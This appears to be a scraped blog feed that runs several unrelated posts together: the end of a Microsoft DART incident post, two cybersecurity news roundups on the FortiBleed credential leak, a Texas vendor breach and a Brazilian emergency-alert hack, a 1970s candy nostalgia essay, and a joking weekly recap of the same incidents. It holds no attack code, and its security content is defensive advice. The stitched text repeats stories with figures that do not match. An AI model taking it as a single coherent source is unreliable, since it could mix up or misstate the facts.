• Strategies to avoid similar cyberattacks.

DART is made up of highly skilled investigators, researchers, engineers, and analysts who specialize in handling global security incidents. We’re here for customers with dedicated experts to work with you before, during, and after a cybersecurity incident.

Learn more

To learn more about DART capabilities, please visit our website, or contact your Microsoft account manager or Premier Support contact. To learn more about the cybersecurity incidents described above, including more insights and information on how to protect your own organization, download the full report.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post One intrusion, two cyberattackers: Uncovering parallel threat activity appeared first on Microsoft Security Blog.

FortiBleed: Massive Credential Leak Exposes ~75,000 Fortinet Firewalls and VPNs Worldwide

In one of the largest credential exposure incidents targeting network security appliances, a campaign dubbed FortiBleed has leaked verified admin and SSL VPN credentials for approximately 73,000–75,000 Fortinet FortiGate firewalls across nearly 200 countries.

Security researchers, including Volodymyr Diachenko, discovered the dataset circulating in underground forums. It reportedly stems from aggressive brute-forcing (billions of attempts) combined with prior compromises, rather than a single new zero-day vulnerability. High-profile organizations (e.g., mentions of Samsung, Oracle, and governments) appear impacted. CISA and others have issued urgent warnings: immediately rotate credentials, enable MFA where possible, audit logs for lateral movement, and consider isolating affected devices.

Why it matters: FortiGate devices are perimeter defenders. Compromised credentials turn them into beachheads for deeper network infiltration, ransomware, or espionage. This highlights the persistent risk of weak/default credentials and the scale of internet-exposed management interfaces. Organizations should treat this as an active threat and prioritize credential hygiene and network segmentation.

Texas Parks & Wildlife Vendor Breach Exposes Data of Over 3 Million Residents

Texas Cyber Command detected a breach at a third-party vendor handling hunting and fishing license sales for the Texas Parks and Wildlife Department (TPWD). Personal information for 3,087,721 individuals—including driver’s license details, passport numbers (if provided), emails, phone numbers, and addresses—was potentially accessed.

Notably, Social Security numbers, dates of birth, and financial/credit card data were not compromised. TPWD is offering free credit monitoring via Kroll and has implemented additional safeguards. This ranks as one of Texas’s largest breaches of the year and underscores supply-chain/third-party risks in government services.

Implications: Affected Texans should monitor accounts for identity theft. Broader lesson: Government outsourcing of citizen data processing creates concentrated risk. Vendors must meet stringent security standards, and agencies need robust vendor risk management and incident response plans.

Hackers Breach Brazil’s Civil Defense Alert System, Send “Misanthropy” Warnings to Millions

Early on June 20, 2026, millions of cell phones across Brazilian states (including São Paulo, Rio de Janeiro, and Paraná) received unauthorized “Extreme Alert” messages containing the word “misantropi4” (leetspeak for misanthropy, or hatred of humanity). The National Civil Defense system was compromised, taken offline around 1:30 a.m. local time, and the incident is under Federal Police investigation.

The attack exploited the emergency broadcast/notification infrastructure, causing widespread alarm before being identified as a hack. It exposed weaknesses in public alerting systems, such as insufficient access controls or MFA on remote administration.

Key takeaway: Critical national infrastructure like emergency alert platforms must be hardened against unauthorized access. This incident, while not causing physical harm, demonstrates how cyber intrusions can sow public panic and erode trust. Expect increased scrutiny and potential regulatory changes for such systems globally.

These events in just the last day illustrate ongoing themes: credential theft at scale, third-party supply chain weaknesses, and attacks on public infrastructure. Stay vigilant—patch, rotate creds, monitor vendors, and prepare for rapid response.

Ah, the 1970s. Bell-bottoms, Saturday morning cartoons, and a candy aisle that felt like the Wild West. Back then, no one batted an eye at treats that today would trigger a congressional hearing. We’re talking candy that looked suspiciously like cigarettes, gum shredded to mimic chewing tobacco, and popping sugar that sparked urban legends about exploding stomachs. These weren’t just snacks—they were tiny rebellions in wax paper and foil pouches. Parents rolled their eyes, kids blew fake smoke rings, and somehow we all survived to tell the tale. Let’s take a nostalgic (and slightly questionable) stroll down memory lane.

The Smoking Sticks: Candy Cigarettes and the Great Controversy

Nothing screamed “edgy childhood” like cracking open a pack of candy cigarettes. These little white sticks came in boxes mimicking Marlboros or Camels, complete with red tips for that authentic “lit” look. Some even had powdery “tobacco” inside so you could blow dramatic smoke clouds. You’d tuck one in the corner of your mouth, strut around the playground like a mini Humphrey Bogart, and pretend you were tough.

But the grown-ups? Not amused. The 1964 Surgeon General’s report on smoking had already lit a fire under public health concerns, and candy cigarettes got dragged into the crossfire. Critics argued they glamorized the habit and primed kids for the real thing. There were failed federal ban attempts in 1970 and 1991, and a few states tried (and mostly failed) to yank them off shelves. By the late ’70s, many brands quietly rebranded as “candy sticks” or “stix” to dodge the heat. Tobacco companies distanced themselves faster than you could say “trademark infringement.”

Later studies even suggested a link: kids who puffed on the candy versions were more likely to pick up real cigarettes as teens. Yikes. Yet here we were, blowing powder “smoke” without a care, learning early that some rules were made to be bent—at least until Mom confiscated the pack.

The Popping Panic: Pop Rocks and the Great Stomach-Explosion Myth

If candy cigarettes were about playing grown-up, Pop Rocks were pure chaotic fun. Introduced in the U.S. around 1976 (after an accidental invention in 1956 by a General Foods scientist trying to make fizzy soda mix), these tiny crystals crackled and popped on your tongue thanks to trapped carbon dioxide. One packet and your mouth felt like a tiny fireworks show.

Then came the legend: mix Pop Rocks with Coke and your stomach would explode. The story somehow tied it to “Mikey” from the Life cereal commercials (spoiler: he’s alive and well). Parents freaked. Sales tanked. General Foods ran newspaper ads and even mailed letters to school principals swearing it was safe. No explosions, no lawsuits—just fizzy sugar and a whole generation learning that rumors can be more explosive than the candy itself.

We dared each other anyway. “Don’t drink anything!” we’d whisper, then chase it with soda just to feel alive. The worst that happened? A tickle in your throat and a sugar high that lasted till dinner.

Chewing Like the Big Leaguers: Big League Chew

Not content with fake smokes, we also had Big League Chew—shredded bubble gum in a foil pouch that looked exactly like the chewing tobacco baseball players stuffed in their cheeks. Launched right at the tail end of the ’70s (1980, but we’ll claim it for the decade), it was pitched as a fun, harmless alternative for kids idolizing their heroes who chomped tobacco on the diamond.

You’d pinch out a massive wad, stuff it in your mouth, and blow bubbles the size of your head. It was messy, it was ridiculous, and critics said it normalized tobacco habits. But to us? It was baseball fantasy in a pouch. We felt like pros without the spit or the health risks.

Bonus Round: Fun Dip and the Art of Dipping Powder

While we’re at it, let’s not forget Fun Dip (aka Lik-M-Aid)—those little packets of tangy powder with a candy stick for dipping. It was basically legalized dipping snuff for the elementary set. You’d lick the stick, plunge it into the neon-colored dust, and go to town. Messy? Yes. Delicious? Absolutely. Questionable by today’s standards? 100%. It taught us the joy of controlled chaos and the importance of not inhaling the powder (lesson learned the hard way).

How These Treats “Built Character” (or at Least Resilience)

Here’s the thing: these snacks weren’t just candy. They were life lessons wrapped in sugar.

• Risk assessment 101: We survived Pop Rocks myths, fake cigarette bans, and shredded-gum pouches without exploding or turning into chain-smokers. It taught us to question hype and test boundaries safely.

• Imagination and play: Pretending to smoke or chew like the pros built storytelling skills and role-playing chops. We didn’t need apps—we had props.

• Toughness through weird textures: Popping candy on your tongue, chewing wax-like gum, or inhaling stray powder? Modern kids get warnings for less. We just shrugged and asked for another pack.

• Resilience in a less bubble-wrapped world: No parental alerts on every wrapper. We figured out what was hype and what was harmless fun. It made us a little bolder, a little less fragile.

Sure, our teeth probably paid the price, and yes, today’s standards are (mostly) smarter. But those edgy treats gave us stories, laughs, and the quiet confidence that comes from surviving playground dares and urban legends alike.

The Sweet Aftertaste

The candy aisle has been sanitized, the packaging has been neutered, and “cigarettes” are long gone from the labels. Yet every time I see a retro candy display, I smile. Those questionable ’70s treats weren’t perfect—but they were ours. They built memories stronger than any sugar rush and proved that a little controversy (and a lot of popping, shredding, and pretending) never hurt anyone.

What was your most questionable childhood candy? Drop it in the comments—I’m betting someone out there still has a soft spot for those wax bottle nips or those exploding myths. Here’s to the snacks that made us who we are: slightly sticky, mostly resilient, and forever nostalgic.

FortiBleed – Massive Credential Exposure Hits ~75,000 Fortinet Firewalls & VPNs

A large-scale credential harvesting campaign dubbed FortiBleed has exposed administrator credentials for tens of thousands of Fortinet FortiGate firewalls and VPN gateways worldwide. Researchers (including SOCRadar, Hudson Rock, and others) discovered an attacker-operated server leaking validated logins affecting devices across 194 countries. Estimates range from 30,000–75,000 compromised devices, representing a huge portion of internet-exposed Fortinet gear.

The campaign leveraged previously stolen configuration files, weak hashing, and brute-forcing/password spraying rather than a fresh zero-day in many cases. CISA issued urgent guidance to harden devices: reset passwords, enable MFA, restrict management access, update firmware, and review logs. Organizations in finance, government, and critical infrastructure are particularly exposed.

Key takeaway: Edge security devices are prime targets. Default/weak credentials and unpatched systems continue to bite hard. Immediate action: inventory Fortinet assets, force credential rotation, and monitor for lateral movement.

Texas Parks & Wildlife Data Breach Exposes Info on Over 3 Million Residents

The Texas Parks and Wildlife Department (TPWD) disclosed a breach at a third-party vendor handling hunting and fishing license sales. An unauthorized actor may have accessed personal data for approximately 3,087,721 Texans, including driver’s license info, passport numbers (if provided), emails, phone numbers, and addresses. SSN, DOB, and financial data were reportedly not compromised.

Texas Cyber Command detected the incident. Affected individuals are being offered free credit monitoring via Kroll. This ranks as one of the largest recent state-level breaches in Texas and highlights ongoing risks in government vendor ecosystems handling citizen PII.

Key takeaway: Supply-chain and vendor risks remain a massive blind spot. Individuals should monitor accounts, watch for phishing, and consider freezes if notified.

Microsoft Patches Record Flaws Including Defender Zero-Days; Splunk RCE Looms

Microsoft addressed a record 206 vulnerabilities in its June Patch Tuesday, including multiple zero-days. Notably, the RoguePlanet zero-day in Microsoft Defender could grant SYSTEM-level access. Patches are rolling out urgently.

Separately, a critical unauthenticated remote code execution flaw in Splunk Enterprise is under active exploitation warnings—attackers could run code without auth on exposed instances. Organizations using Splunk should prioritize patching and segmentation.

Key takeaway: Zero-days in security tools themselves (Defender, firewalls, logging platforms) amplify risk. Patch aggressively, minimize exposure, and layer defenses.

Broader Trends – China-Linked Activity, AI Threats, and Ongoing Exploits

Supporting chatter includes China-linked groups persisting in networks, active exploitation of other VPN/web vulnerabilities (e.g., Palo Alto), and warnings around AI-enhanced attacks and credential reuse. Fortinet issues dominate recent discussions.

Overall Advice:

• Audit and harden internet-facing devices (especially VPNs/firewalls).

• Enforce MFA everywhere, rotate credentials, and monitor for anomalous logins.

• Keep security tooling patched.

• Test incident response for supply-chain scenarios.

• Individuals: Enable monitoring, use password managers, and be vigilant.

Stay safe out there—cyber threats move fast in 2026.

Hello, fellow digital defenders, weekend warriors, and anyone who’s ever clicked “Remind Me Later” on a critical update! It’s your pal Rod here with another edition of Rod’s Saturday Funnies. Grab your coffee (or energy drink – no judgment), and let’s turn last week’s parade of digital disasters into slapstick comedy. Think Wile E. Coyote trying to catch the Road Runner with increasingly ridiculous gadgets, except the gadgets are firewalls and the Road Runner is a bunch of credential-stuffing hackers.

Episode 1: “FortiBleed – The Password That Wouldn’t Die”

Picture this: It’s a beautiful mid-June morning. Thousands of network admins are sipping lattes, feeling pretty smug about their shiny Fortinet FortiGate firewalls standing guard like loyal cartoon bulldogs. Then – boing! – FortiBleed hits. Bad guys (probably some Russian-speaking crew in a dimly lit basement lair) went on a global treasure hunt, cracking old password hashes from exposed devices.

We’re talking 30,000 to 75,000 firewalls compromised across 194 countries. Big names like Samsung, Oracle, Spotify, and even a NATO contractor got their admin creds served up on a silver platter. It wasn’t some fancy zero-day ninja move – just good ol’ “Hey, did you change that default password from 2019?” The firewalls were basically yelling, “Come on in, the backdoor’s propped open with a brick!”

Moral of the story, kids: Change your passwords, enable MFA, and hide those management interfaces faster than Bugs Bunny ducks into a hole. Otherwise, your firewall becomes less “impenetrable fortress” and more “welcome mat for cyber clowns.” CISA, NCSC, and friends are all waving red flags – listen up!

Episode 2: “Ivanti Sentry Goes Full Looney Tunes”

Next up, Ivanti Sentry decides to star in its own action-comedy short. Around June 9-10, two critical vulnerabilities drop: CVE-2026-10520 (a perfect 10.0 OS command injection – root access, no ticket needed!) and CVE-2026-10523 (authentication bypass so easy, it might as well hand out admin accounts like candy at a parade).

Unauthenticated attackers could waltz in, inject commands, create accounts, and basically throw a root-level party on your device. CISA tossed it into the Known Exploited Vulnerabilities catalog quicker than Daffy Duck gets into trouble. Patch those bad boys yesterday – or enjoy your systems starring as the villain’s new vacation home.

Episode 3: “Uncle Sam Shortens the Patch Deadline – No More Snoozing!”

In a plot twist straight out of a spy cartoon, the U.S. cyber defense folks (CISA) announced agencies now have just three days to fix the most serious vulnerabilities. Why the rush? Blame those pesky AI-powered hackers who are exploiting flaws faster than you can say “patch Tuesday.” No more “I’ll do it after lunch” – it’s “fix it or the bad guys win” time.

Imagine the Road Runner holding up a sign: “Beep beep – patch faster!” AI is speeding up both sides, but defenders better lace up those sneakers.

Episode 4: “ShinyHunters and the Endless Data Piñata”

Those lovable scamps at ShinyHunters (and affiliates) kept swinging at the education sector and beyond, with big hits like Instructure/Canvas exposing massive user records. Oracle exploits, vishing calls on telecoms like Spectrum and Carnival Cruise lines – it’s like they have a never-ending supply of piñatas filled with passports, fingerprints, and customer data. One wrong click, and confetti of doom everywhere.

Bonus Quick Hits (The Gag Reel)

• Supply chain attacks on npm packages (Mastra AI) sneaking in malicious code disguised as innocent date libraries. Because nothing says “trust me” like a sneaky dependency.

• Microsoft patching a ton of flaws, including zero-days. Defender “RoguePlanet” exploits running around like an uninvited cartoon Tasmanian Devil.

• General reminder: Ransomware, phishing, and AI-enhanced shenanigans are still thriving. Third-party risks and supply chains are the gift that keeps on giving (to attackers).

Closing Credits & Rod’s Wisdom

Folks, cybersecurity isn’t about being perfect – it’s about not being the easiest cartoon target on the screen. Patch promptly, rotate creds like they’re going out of style, train your humans, and monitor like your job depends on it (it does).

Stay safe, stay silly, and I’ll see you next Saturday for more laughs at the expense of bad opsec. What was your favorite “oops” moment this week? Drop it in the comments – anonymously, of course.

Rod out. 🛡️😂

(This post is for entertainment and awareness. Always verify with official sources and patch your stuff!)